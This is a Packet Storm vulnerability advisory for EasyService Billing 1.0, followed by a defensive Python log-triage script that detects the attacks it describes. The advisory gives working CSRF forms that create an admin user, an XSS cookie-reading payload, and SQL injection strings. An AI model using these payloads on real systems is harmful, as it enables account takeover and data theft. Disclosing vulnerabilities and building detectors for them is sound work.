EasyService Billing 1.0 CSRF / XSS / SQL Injection

Source: packetstormsecurity.com (PACKETSTORM:147905)
Author: Divya Jain
Published: May 26, 2018

EPSS: 0.008 (percentile 81.2%)

Exploit 1 of 3:  
  
<!--  
# Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery  
# Date: 25-05-2018  
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594   
# Exploit Author: Divya Jain  
# Version: EasyService Billing 1.0   
# CVE: CVE-2018-11445,CVE-2018-11442  
# Category: Webapps  
# Severity: Medium  
# Tested on: KaLi LinuX_x64  
# # # # # # # #  
#  
# Proof of Concept:  
//////////////////////////  
/ CSRF in Quotation Page /  
//////////////////////////  
# Initial Request:  
  
POST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1  
Host: test.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139  
Cookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 86  
  
quotation_id=139&quotation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1  
  
# CSRF POC:  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139" method="POST">  
<input type="hidden" name="quotation_id" value="139" />  
<input type="hidden" name="quotation_no" value="249" />  
<input type="hidden" name="des" value="testnew" />  
<input type="hidden" name="button" value="Save" />  
<input type="hidden" name="MM_update" value="form1" />  
<input type="hidden" name="MM_insert" value="form1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
///////////////////////////  
// CSRF in User Add Page //  
///////////////////////////  
  
# Initial Request  
  
POST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1  
Host: test.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://test.com/EasyServiceBilling/system-settings-user-new2.php  
Cookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6  
Connection: close  
Upgrade-Insecure-Requests: 1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 36  
  
type=Admin&un=a&pw=b&MM_insert=form1  
  
# CSRF POC  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://test.com/EasyServiceBilling/system-settings-user-new2.php?" method="POST">  
<input type="hidden" name="type" value="Admin" />  
<input type="hidden" name="un" value="adminTest" />  
<input type="hidden" name="pw" value="adminTest" />  
<input type="hidden" name="MM_insert" value="form1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
  
-->  
  
Exploit 2 of 3:  
  
<!--  
# Exploit Title: EasyService Billing 1.0 Cross-Site Scripting in 'q' Parameter  
# Date: 25-05-2018  
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594   
# Exploit Author: Divya Jain  
# Version: EasyService Billing 1.0   
# CVE: CVE-2018-11443  
# Category: Webapps  
# Severity: Medium  
# Tested on: KaLi LinuX_x64  
# # # # #  
#   
# Proof of Concept:  
#  
///////////  
// XSS //  
///////////  
  
Affected Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=  
Payload: %27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27  
Parameter: q  
Link: http://test.com/EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27  
  
###########################################################################  
  
  
  
Exploit 3 of 3:  
  
<!--  
# Exploit Title: EasyService Billing 1.0 SQL Injection on page jobcard-ongoing.php?q=  
# Date: 25-05-2018  
# Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594   
# Exploit Author: Divya Jain  
# Version: EasyService Billing 1.0   
# CVE: CVE-2018-11444  
# Category: Webapps  
# Severity: High  
# Tested on: KaLi LinuX_x64  
# # # # # # # #  
#  
  
# Proof of Concept:  
////////////////////////////////  
SQL Injection in q parameter  
///////////////////////////////  
Affected Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=  
# Boolean Based Blind SQL  
Payload: 1337'OR%20NOT 1=1--  
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT 1=1--  
  
# Error-Based SQL  
Payload: 1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD  
  
Link: test.com/EasyServiceBilling/jobcard-ongoing.php?q=1337'AND%20(SELECT%202%20FROM(SELECT%20COUNT(*),CONCAT(0x7162627161,(SELECT(ELT(2=2,1))),0x717a6b6271,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a)%20AND%20'aBCD'='aBCD  
#################################  
  
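For the defender's side of the three PoCs above, here is an added log-triage example that is not part of the advisory: it parses constructed Apache combined-log lines (the host test.com comes from the advisory; the client IP, timestamps, Referer values and log format are assumptions) and flags the request shapes shown, namely a POST to the two state-changing pages without a same-site Referer, and a jobcard-ongoing.php `q` value carrying script tags or SQL syntax.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed Apache combined-log lines (not taken from the advisory) that
# replay its three request shapes against an assumed host, test.com.
SAMPLE_LOG = """\
203.0.113.5 - - [26/May/2018:10:01:02 +0000] "POST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1" 200 512 "http://attacker.example/csrf.html" "Mozilla/5.0"
203.0.113.5 - - [26/May/2018:10:01:09 +0000] "POST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1" 200 640 "http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139" "Mozilla/5.0"
203.0.113.5 - - [26/May/2018:10:02:15 +0000] "GET /EasyServiceBilling/jobcard-ongoing.php?q=%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%27 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [26/May/2018:10:03:30 +0000] "GET /EasyServiceBilling/jobcard-ongoing.php?q=1337'OR%20NOT%201=1-- HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [26/May/2018:10:04:00 +0000] "GET /EasyServiceBilling/jobcard-ongoing.php?q=printer HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$')
# The two state-changing pages the CSRF PoCs post to.
CSRF_SENSITIVE = {"/EasyServiceBilling/system-settings-user-new2.php",
                  "/EasyServiceBilling/quotation-new3-new2.php"}
# Heuristic for the q payloads: script tags, quote+OR/AND, trailing comment, SELECT.
INJECTION_RE = re.compile(r"<\s*/?\s*script|'\s*(?:or|and)\b|--\s*$|\bselect\b", re.I)


def classify(line, site_host="test.com"):
    """Return None for an unparsable line, else a list of finding strings."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    findings = []
    if m["method"] == "POST" and url.path in CSRF_SENSITIVE:
        # history.pushState in the PoC rewrites the path, not the origin, so a
        # forged request still carries a foreign Referer, or none at all (also
        # flagged). Only a server-side anti-CSRF token actually closes the hole.
        ref_host = urlsplit(m["referer"]).hostname if m["referer"] != "-" else None
        if ref_host != site_host:
            findings.append("csrf-suspect: off-site POST to %s, Referer %r" % (url.path, m["referer"]))
    if url.path == "/EasyServiceBilling/jobcard-ongoing.php":
        for raw in parse_qs(url.query, keep_blank_values=True).get("q", []):
            value = unquote_plus(raw)  # parse_qs decoded once; also catch double-encoding
            if INJECTION_RE.search(value):
                findings.append("injection-suspect: q=%r" % value)
    return findings


def scan(log_text, site_host="test.com"):
    """Flatten findings over a whole log into (client_ip, finding) pairs."""
    return [(line.split(" ", 1)[0], f) for line in log_text.splitlines()
            for f in classify(line, site_host) or []]
```

The Referer check is a triage heuristic only; the same-origin POST on the second sample line is legitimately silent, and a browser that strips Referer will also trip it.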
